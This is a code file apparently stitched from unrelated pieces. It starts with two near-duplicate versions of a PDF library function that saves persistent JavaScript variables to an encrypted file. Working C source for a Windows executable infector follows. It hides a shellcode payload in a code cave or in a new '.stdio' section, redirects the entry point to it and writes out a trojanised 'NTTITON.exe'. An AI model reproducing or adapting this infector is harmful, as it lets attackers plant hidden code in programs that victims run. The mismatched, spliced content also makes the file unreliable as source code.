void CJS_GlobalData::SaveGlobalPersisitentVariables() {
uint32_t nCount = 0;
CFX_BinaryBuf sData;
for (const auto& pElement : m_arrayGlobalData) {
if (pElement->bPersistent) {
CFX_BinaryBuf sElement;
MakeByteString(pElement->data.sKey, &pElement->data, sElement);
if (sData.GetSize() + sElement.GetSize() > JS_MAXGLOBALDATA)
break;
sData.AppendBlock(sElement.GetBuffer(), sElement.GetSize());
nCount++;
}
}
CFX_BinaryBuf sFile;
uint16_t wType = (uint16_t)(('X' << 8) | 'F');
sFile.AppendBlock(&wType, sizeof(uint16_t));
uint16_t wVersion = 2;
sFile.AppendBlock(&wVersion, sizeof(uint16_t));
sFile.AppendBlock(&nCount, sizeof(uint32_t));
uint32_t dwSize = sData.GetSize();
sFile.AppendBlock(&dwSize, sizeof(uint32_t));
sFile.AppendBlock(sData.GetBuffer(), sData.GetSize());
CRYPT_ArcFourCryptBlock(sFile.GetBuffer(), sFile.GetSize(), JS_RC4KEY,
sizeof(JS_RC4KEY));
WriteFileBuffer(m_sFilePath.c_str(), (const FX_CHAR*)sFile.GetBuffer(),
sFile.GetSize());
}
void CJS_GlobalData::SaveGlobalPersisitentVariables() {
FX_DWORD nCount = 0;
CFX_BinaryBuf sData;
for (int i = 0, sz = m_arrayGlobalData.GetSize(); i < sz; i++) {
CJS_GlobalData_Element* pElement = m_arrayGlobalData.GetAt(i);
if (pElement->bPersistent) {
CFX_BinaryBuf sElement;
MakeByteString(pElement->data.sKey, &pElement->data, sElement);
if (sData.GetSize() + sElement.GetSize() > JS_MAXGLOBALDATA)
break;
sData.AppendBlock(sElement.GetBuffer(), sElement.GetSize());
nCount++;
}
}
CFX_BinaryBuf sFile;
FX_WORD wType = (FX_WORD)(('X' << 8) | 'F');
sFile.AppendBlock(&wType, sizeof(FX_WORD));
FX_WORD wVersion = 2;
sFile.AppendBlock(&wVersion, sizeof(FX_WORD));
sFile.AppendBlock(&nCount, sizeof(FX_DWORD));
FX_DWORD dwSize = sData.GetSize();
sFile.AppendBlock(&dwSize, sizeof(FX_DWORD));
sFile.AppendBlock(sData.GetBuffer(), sData.GetSize());
CRYPT_ArcFourCryptBlock(sFile.GetBuffer(), sFile.GetSize(), JS_RC4KEY,
sizeof(JS_RC4KEY));
WriteFileBuffer(m_sFilePath.c_str(), (const FX_CHAR*)sFile.GetBuffer(),
sFile.GetSize());
}
int main(int argc, char* argv[])
{
void* lpBuffer = 0;
unsigned long ulBuffer = CreateFileBuffer(argv[1], &lpBuffer);
if (lpBuffer)
{
if (ulBuffer)
{
unsigned long ulCodeCave = 0;
CodeCave sCodeCave = {0};
if (ulCodeCave = ScanCodeCave(&sCodeCave, lpBuffer,ulBuffer,sizeof(ucShellCode)+10))
{
unsigned long ulOffset = 0;
m_memcpy((void*)(sCodeCave.ulAddress), ucCallCode, sizeof(ucCallCode));
ulOffset = sCodeCave.ulEntryPoint - (sCodeCave.ulVirtualAddress + sCodeCave.ulVirtualAddressOffset + sizeof(ucCallCode)) - 5;
m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long));
m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP));
m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode));
if (WriteFileBuffer("NTTITON.exe", lpBuffer,ulBuffer) == ulBuffer)
{
printf("Done\n");
}
}
else
{
AddSection(lpBuffer,ulBuffer, sizeof(ucShellCode) + 10);
}
}
VirtualFree(lpBuffer,ulBuffer,MEM_RELEASE);
}
return 0;
}
void AddSection(void* lpModule, unsigned long ulModule, unsigned long ulRawSize)
{
PIMAGE_DOS_HEADER lpDos = (PIMAGE_DOS_HEADER)(lpModule);
PIMAGE_NT_HEADERS lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpDos + lpDos->e_lfanew);
if (lpNt->Signature == IMAGE_NT_SIGNATURE)
{
unsigned long ulNewImageSize = ulModule + CalculateBoundary(lpNt->OptionalHeader.FileAlignment, ulRawSize);
if (ulNewImageSize)
{
void * lpNewBase = VirtualAlloc(NULL,ulNewImageSize,MEM_COMMIT|MEM_RESERVE,0x40);
if (lpNewBase)
{
PIMAGE_SECTION_HEADER lpLastSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpNewBase + lpDos->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ((lpNt->FileHeader.NumberOfSections-1)*40));
PIMAGE_SECTION_HEADER lpNewSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpLastSection + sizeof(IMAGE_SECTION_HEADER));
unsigned long ulEOF = 0;
unsigned long ulCheckSum = 0;
unsigned long ulOldCheckSum = 0;
unsigned long ulEntryPoint = 0;
unsigned long ulOffset = 0;
lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpNewBase+ lpDos->e_lfanew);
RtlSecureZeroMemory(lpNewBase,ulNewImageSize);
m_memcpy(lpNewBase,lpModule,ulModule);
m_memcpy(&lpNewSection->Name, ".stdio", strlen(".stdio"));
lpNewSection->SizeOfRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment,ulRawSize);
lpNewSection->PointerToRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment, lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData);
lpNewSection->VirtualAddress = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpLastSection->VirtualAddress + lpLastSection->Misc.VirtualSize);
lpNewSection->Characteristics = (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ);
lpNewSection->Misc.VirtualSize = ulRawSize;
lpNt->FileHeader.NumberOfSections++;
lpNt->OptionalHeader.SizeOfImage = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpNewSection->VirtualAddress + ulRawSize);
ulEntryPoint = lpNt->OptionalHeader.AddressOfEntryPoint;
m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData), ucCallCode, sizeof(ucCallCode));
ulOffset = ulEntryPoint - (lpNewSection->VirtualAddress + sizeof(ucCallCode)) - 5;
m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long));
m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP));
m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode));
if (ulEOF = GetEOFSize(lpLastSection, ulModule))
{
m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + lpNewSection->SizeOfRawData), (void*)((unsigned long)lpModule + (lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData)), ulEOF);
}
lpNt->OptionalHeader.AddressOfEntryPoint = (lpNewSection->VirtualAddress);
if (CheckSumMappedFile(lpNewBase,ulNewImageSize, &ulOldCheckSum, &ulCheckSum))
{
lpNt->OptionalHeader.CheckSum = ulCheckSum;
}
if (WriteFileBuffer("NTTITON.exe",lpNewBase,ulNewImageSize))
{
printf("Had to add section.... no codecaves were available FUUUUCK\n");
}
VirtualFree(lpNewBase,ulNewImageSize,MEM_RELEASE);
}
}
}
}
